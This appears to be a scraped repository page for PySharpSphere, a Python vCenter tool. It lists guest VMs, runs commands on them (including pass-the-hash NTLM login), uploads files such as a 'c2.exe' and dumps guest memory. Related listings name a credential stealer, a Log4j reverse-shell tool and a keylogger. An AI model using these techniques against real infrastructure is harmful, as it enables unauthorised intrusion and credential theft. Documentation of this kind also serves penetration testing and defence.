PySharpSphere - Inspired by SharpSphere, just another python version

Related tags

Security related resourcesPySharpSphere
Overview

PySharpSphere

Inspired by SharpSphere, just another python version.

Installation

python3 setup.py install

Features

  • Support control both Linux and Windows system of virtual machines
  • Execute commands, upload files and dump memory on target guest OS
  • Use NTLM token to execute commands on guest Windows system

SharpSphere Guide

PySharpSphere Usage

usage: pySharpSphere [-h] [-H HOST] [-P PORT] [-u USER] [-p PASSWORD]
                     [-c CERT] [-k KEY] [-d DOMAIN]
                     {list,execute,upload,dump} ...

positional arguments:
  {list,execute,upload,dump}
                        sub-command
    list                list virtual machines
    execute             execute command on target machine
    upload              upload file to target machine
    dump                dump memory of target machine

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  vCenter Server host
  -P PORT, --port PORT  vCenter Server port
  -u USER, --username USER
                        vCenter Server username
  -p PASSWORD, --password PASSWORD
                        vCenter Server password

0. List virtual machines

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password list
[*] Retrieve virtual machines list ...
DataCenter    MoID     Name                           Power    OS                                         Tools         IP
------------  -------  -----------------------------  -------  -----------------------------------------  ------------  --------------
Datacenter    vm-1015  Windows Server 2012 (VC67)     Off      Microsoft Windows Server 2012 (64-bit)     Current
Datacenter    vm-1030  VMware vCenter Server 7.0U2b   On       Other 3.x or later Linux (64-bit)          Unmanaged     192.168.100.49
Datacenter    vm-1017  VMware vCenter Server 6.7U3l   Off      Other 3.x or later Linux (64-bit)          Unmanaged
Datacenter    vm-1020  Operation Machine (Windows 7)  On       Microsoft Windows 7 (64-bit)               Current       192.168.100.2

1. Execute commands on guest OS

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password execute -t vm-1020 --guest-user administrator --guest-pass guestpassword -c whoami
[*] Execute command on target virtual machine ...
[*] Retrieve virtual machines list ...
[*] Target OS is Windows, using C:\Windows\system32\cmd.exe to execute command ...
[+] Process start successfully with PID 1200
[*] Program exited, retrieving output ...
[*] Command output:
operation-machi\administrator

2. Upload file to target virtual machine

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password upload -t vm-1020 --guest-user administrator --guest-pass guestpassword --source /tmp/test.exe --dest C:\\c2.exe
[*] Retrieve virtual machines list ...
[*] Uploading file to VM 'vim.VirtualMachine:vm-1020' ...
[*] Sending file data ...
[+] Uploaded file to C:\c2.exe successfully

3. Dump memory of guest OS

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password dump -t vm-1020
[*] Retrieve virtual machines list ...
[*] Finding snapshot on target machine vm-1020
[+] Found exists snapshot!
[*] Finding snapshot files ...
[*] Downloading .vmsn file ...
[+] Downloaded successfully: Ubuntu-Snapshot1.vmsn
[*] Downloading .vmem file ...
[+] Downloaded successfully: Ubuntu-Snapshot1.vmem

4. Execute commands on guest OS using NTLM

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password execute -t vm-1015 --guest-user administrator --guest-ntlm ea41383fa39c20f186cbcdc0ac234417 -c whoami
[*] Execute command on target virtual machine ...
[*] Retrieve virtual machines list ...
[*] Target OS is Windows, using C:\Windows\system32\cmd.exe to execute command ...
[*] Starting NTLM authentication ...
[+] Process start successfully with PID 2624
[*] Program exited, retrieving output ...
[*] Command output:
win-i1el8084mf0\administrator
Owner
Ricter Zheng
uid=1337(ricter) gid=1337(ricter) groups=1001(ctf),1002(acg),1003(security)
Ricter Zheng
GitHub Repository
Threat Intelligence Gathering 威胁情报收集,旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率。

0x00 介绍 tig Threat Intelligence Gathering 威胁情报收集,旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率,目前已集成微步、IP 域名反查、Fofa 信息收集、ICP 备案查询、IP 存活检测五个模块,现已支持以下信息的查询: ✅ 微步标签 ✅ I

Wolf Group Security Team 698 Dec 09, 2022
Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.

We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams

Mitiga 13 Jan 04, 2022
A python implementation of the windows 95 product key check.

Windows 95 Product Key Check Info: This is a python implementation of the windows 95 product key check. This was just a bit of fun and a massive 5 hou

11 Aug 07, 2022
script that pulls cve collections from NVD.NIST.GOV.

# cvepull.py #script that pulls cve collections from NVD.NIST.GOV. #edit line 17 (timedelta) number to change the amount of days to search backwards

Aaron W 1 Dec 18, 2021
Fetch Chrome, Firefox, WiFi password and system info

DISCLAIMER : OUR TOOLS ARE FOR EDUCATIONAL PURPOSES ONLY. DON'T USE THEM FOR ILLEGAL ACTIVITIES. YOU ARE THE ONLY RESPONSABLE FOR YOUR ACTIONS! OUR TO

Genos 59 Nov 17, 2022
Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

FaisalFs 16 Mar 24, 2022
DependConfusion-X Tool is written in Python3 that scans and monitors list of hosts for Dependency Confusion

DependConfusion-X Tool is written in Python3 which allows security researcher/bug bounty hunter to scan and monitor list of hosts for Dependency Confusion.

Ali Fathi Ali Sawehli 4 Dec 21, 2021
Learning to compose soft prompts for compositional zero-shot learning.

Compositional Soft Prompting (CSP) Compositional soft prompting (CSP), a parameter-efficient learning technique to improve the zero-shot compositional

Bats Research 32 Jan 02, 2023
Ensure secure infrastructure and consistency with the firewall rules

Python Port Scanner This script tries to check if it's possible to make a connection with the specific endpoint port. This is very useful to ensure se

Allan Avelar 7 Feb 26, 2022
Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Matt Creel 27 Dec 20, 2022
A collection of write-ups and solutions for Cyber FastTrack Spring 2021.

IMPORTANT: Please contact us before you use any styling or content shown here! Cyber FastTrack Spring 2021 / National Cyber Scholarship Competition -

Alice 48 Aug 28, 2022
this keylogger is only for pc not for android but it will only work on those pc who have python installed it is made for all linux,windows and macos

Keylogger this keylogger is only for pc not for android but it will only work on those pc who have python installed it is made for all linux,windows a

Titan_Exodous 1 Nov 04, 2021
Ethereum transaction decoder (community version).

EthTx Community Edition Community version of EthTx transaction decoder Local environment For local instance, you need few things: Depending on your di

240 Dec 21, 2022
Official implementation of the paper "Backdoor Attacks on Self-Supervised Learning".

SSL-Backdoor Abstract Large-scale unlabeled data has allowed recent progress in self-supervised learning methods that learn rich visual representation

UMBC Vision 44 Nov 21, 2022
Python Library For Ethical Hacker

Python Library For Ethical Hacker

11 Nov 03, 2022
About Hive Burp Suite Extension

Hive Burp Suite Extension Description Hive extension for Burp Suite. This extension allows you to send data from Burp to Hive in one click. Create iss

7 Dec 07, 2022
High level cheatsheet that was designed to make checks on the OSCP more manageable

High level cheatsheet that was designed to make checks on the OSCP more manageable. This repository however could also be used for your own studying or for evaluating test systems like on HackTheBox

Jacob Scheetz 89 Jan 01, 2023
ssh-audit is a tool for ssh server & client configuration auditing.

SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)

Joe Testa 1.4k Dec 31, 2022
Unicode fuzzer for various purposes

UnicodeToy Unicode fuzzer for various purposes Unicode based on version 14.0 features Generate the shortest xss domain payload Generate unicode str, u

33 Nov 27, 2022
Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples

Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples Above is an adversarial example: the slightly pert

Anish Athalye 838 Dec 18, 2022